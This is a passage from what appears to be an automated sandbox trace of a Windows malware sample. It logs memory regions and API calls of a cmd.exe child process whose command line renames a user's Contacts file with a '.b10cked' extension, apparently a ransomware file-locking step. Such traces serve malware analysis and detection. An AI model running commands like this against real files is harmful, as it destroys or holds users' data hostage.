[0210.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.002] SetConsoleInputExeNameW () returned 0x1 [0210.002] GetConsoleOutputCP () returned 0x1b5 [0210.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.002] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.002] exit (_Code=0) Process: id = "508" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30774 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30775 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30776 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30777 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 30778 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30779 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30780 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30781 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30782 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 30783 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30804 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30805 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30806 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 30807 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30808 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 30809 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30810 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30811 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30812 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30813 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30814 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30815 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30816 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30817 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30818 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 30819 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30820 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30821 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30822 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30823 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30824 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30825 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30826 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30827 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 707 os_tid = 0xc4 [0208.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8a4 | out: lpSystemTimeAsFileTime=0x18f8a4*(dwLowDateTime=0xb12d1740, dwHighDateTime=0x1d440a9)) [0208.646] GetCurrentProcessId () returned 0xe54 [0208.646] GetCurrentThreadId () returned 0xc4 [0208.646] GetTickCount () returned 0x3aa61 [0208.646] QueryPerformanceCounter (in: lpPerformanceCount=0x18f89c | out: lpPerformanceCount=0x18f89c*=26543542493) returned 1 [0208.647] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0208.647] __set_app_type (_Type=0x1) [0208.647] __p__fmode () returned 0x76b331f4 [0208.647] __p__commode () returned 0x76b331fc [0208.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0208.647] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0208.647] GetCurrentThreadId () returned 0xc4 [0208.647] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc4) returned 0x38 [0208.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.647] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0208.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.647] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f834 | out: phkResult=0x18f834*=0x0) returned 0x2 [0208.648] VirtualQuery (in: lpAddress=0x18f86b, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.648] GetConsoleOutputCP () returned 0x1b5 [0208.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.648] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0208.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.648] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0208.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.649] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x1a0180* [0208.649] FreeEnvironmentStringsW (penv=0x1a0180) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x1a0180* [0208.649] FreeEnvironmentStringsW (penv=0x1a0180) returned 1 [0208.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x40) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0xa8, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegCloseKey (hKey=0x40) returned 0x0 [0208.649] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x40) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.649] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x4) returned 0x0 [0208.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x9, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0208.650] RegCloseKey (hKey=0x40) returned 0x0 [0208.650] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863aa [0208.650] srand (_Seed=0x5b8863aa) [0208.650] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" [0208.650] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"" [0208.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.650] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0208.650] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0208.650] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.650] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0208.650] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0208.650] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0208.650] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0208.650] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0208.650] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0208.651] GetEnvironmentStringsW () returned 0x1a22d0* [0208.651] FreeEnvironmentStringsW (penv=0x1a22d0) returned 1 [0208.651] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.651] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.651] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0208.651] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0208.651] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0208.651] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0208.651] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0208.651] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0208.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.651] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f570, lpFilePart=0x18f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f56c*="Desktop") returned 0x18 [0208.651] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.651] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.651] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.652] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f2ec | out: lpFindFileData=0x18f2ec) returned 0x1a0010 [0208.652] FindClose (in: hFindFile=0x1a0010 | out: hFindFile=0x1a0010) returned 1 [0208.652] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.652] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0208.652] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0208.652] GetEnvironmentStringsW () returned 0x1a2af0* [0208.652] FreeEnvironmentStringsW (penv=0x1a2af0) returned 1 [0208.652] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.653] GetConsoleOutputCP () returned 0x1b5 [0208.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.653] GetUserDefaultLCID () returned 0x409 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="0") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6b0, cchData=128 | out: lpLCData="1") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0208.653] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0208.653] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0208.654] GetConsoleTitleW (in: lpConsoleTitle=0x1908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.654] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0208.654] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0208.655] _wcsicmp (_String1="move", _String2=")") returned 68 [0208.655] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0208.655] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0208.655] _wcsicmp (_String1="IF", _String2="move") returned -4 [0208.655] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0208.655] _wcsicmp (_String1="REM", _String2="move") returned 5 [0208.655] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0208.657] GetConsoleTitleW (in: lpConsoleTitle=0x18f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.658] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CD") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="REN") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="SET") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="MD") returned 11 [0208.658] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0208.658] _wcsicmp (_String1="move", _String2="RD") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0208.658] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0208.658] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0208.658] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0208.658] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="VER") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0208.658] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0208.658] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0208.658] _wcsicmp (_String1="move", _String2="START") returned -6 [0208.658] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0208.658] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0208.658] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0208.660] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.660] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.660] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0208.660] _wcsnicmp 